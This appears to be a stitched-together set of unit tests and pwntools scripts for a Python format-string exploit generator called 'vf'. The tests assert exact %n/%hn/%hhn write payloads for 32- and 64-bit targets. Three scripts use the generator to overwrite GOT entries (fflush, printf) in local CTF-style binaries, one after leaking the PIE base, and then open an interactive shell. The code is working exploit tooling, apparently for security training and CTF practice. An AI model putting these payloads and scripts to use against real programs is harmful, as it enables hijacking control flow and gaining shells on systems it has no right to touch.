def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
alignment_bytes=20)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'000000000000000000000`\x04\x082`\x04\x08%16364x%10$hn%51196x%11$hn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x402010,
address=0x601030,
offset=10,
arch="64")
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%8208c%17$hn%57392c%18$hn%65472c%19$hn%65536c%20$hn000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
num_writes=4)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'0`\x04\x081`\x04\x082`\x04\x083`\x04\x08%248x%10$hhn%312x%11$hhn%196x%12$hhn%260x%13$hhn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x402010,
address=0x601030,
offset=10,
write_sizes=[2, 1, 2])
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'0\x10`\x002\x10`\x003\x10`\x00%8196x%10$hn%304x%11$hhn%57024x%12$hn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
max_size=30)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'0`\x04\x082`\x04\x08%16384x%10$hn%51196x%11$hn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x00004008,
address=0x8045060,
valueBase=0x55440000,
offset=10)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'`P\x04\x08bP\x04\x08%16384x%10$hn%49144x%11$hn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x00006030,
address_base=0x55440000,
offset=10)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'0`DU2`DU%16384x%10$hn%51196x%11$hn'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
max_size=20)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'0`\x04\x08%134496260x%10$n'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x001020,
address=0x601020,
value_base=0x55440000,
offset=10,
arch=64)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%4128c%17$hn%17700c%18$hn%43708c%19$hn%65536c%20$hn00000 \x10`\x00\x00\x00\x00\x00"\x10`\x00\x00\x00\x00\x00$\x10`\x00\x00\x00\x00\x00&\x10`\x00\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
max_size=88,
arch=64)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%16392c%17$hn%51196c%18$hn%63484c%19$hn%65536c%20$hn00000`\x04\x08\x00\x00\x00\x002`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x006`\x04\x08\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x08044008,
address=0x08046030,
offset=10,
max_size=56,
arch=64)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%134496264c%15$n%4160471032c%16$n00000000`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self):
fs = vf.WriteFmtStr(value=0x402010,
address=0x601030,
offset=10,
arch=64,
num_writes=8)
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%16c%23$hhn%16c%24$hhn%32c%25$hhn%192c%26$hhn%256c%27$hhn%256c%28$hhn%256c%29$hhn%256c%30$hhn000000000000\x10`\x00\x00\x00\x00\x001\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x007\x10`\x00\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
import vf
from pwn import *
target = process("./vf_64")
elf = ELF("vf_64")
fs = vf.WriteFmtStr(value=elf.symbols["pwned"], address=elf.got["fflush"], offset=6, arch=64)
fmtStr = fs.generate_fmt_str()
#print("try: %s" % str(fmtStr))
target.sendline(fmtStr)
target.interactive()
import vf
from pwn import *
target = process("./vf_pie")
elf = ELF("vf_pie")
leak = target.recvline()
leak = leak.split(b"dreaming: ")[1]
leak = leak.strip(b"\n")
pieBase = int(leak, 16) - elf.symbols["main"]
print("pie base: %s" % hex(pieBase))
fs = vf.WriteFmtStr(value=elf.symbols["pwned"],
address=elf.got["fflush"],
value_base=pieBase,
address_base=pieBase,
offset=6)
fmtStr = fs.generate_fmt_str()
print("try: %s" % str(fmtStr))
target.sendline(fmtStr)
target.interactive()
from pwn import *
import vf
target = process("format1")
elf = ELF("format1")
fs = vf.WriteFmtStr(value=elf.symbols["give_shell"],
address=elf.got["printf"],
offset=8,
arch=64)
fmt_st = fs.generate_fmt_str()
target.sendline(fmt_st)
target.interactive()
def test(self):
fs = vf.WriteFmtStr(value=0x402010, address=0x601030, offset=10, arch=64, write_sizes=[2, 1, 2, 1, 2, 2])
test_fmt_str = fs.generate_fmt_str()
correct_fmt_str = b'%8208c%21$hn%304c%22$hhn%57024c%23$hn%256c%24$hhn%65280c%25$hn%65536c%26$hn00000000000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x008\x10`\x00\x00\x00\x00\x00'
self.assertTrue(test_fmt_str == correct_fmt_str)
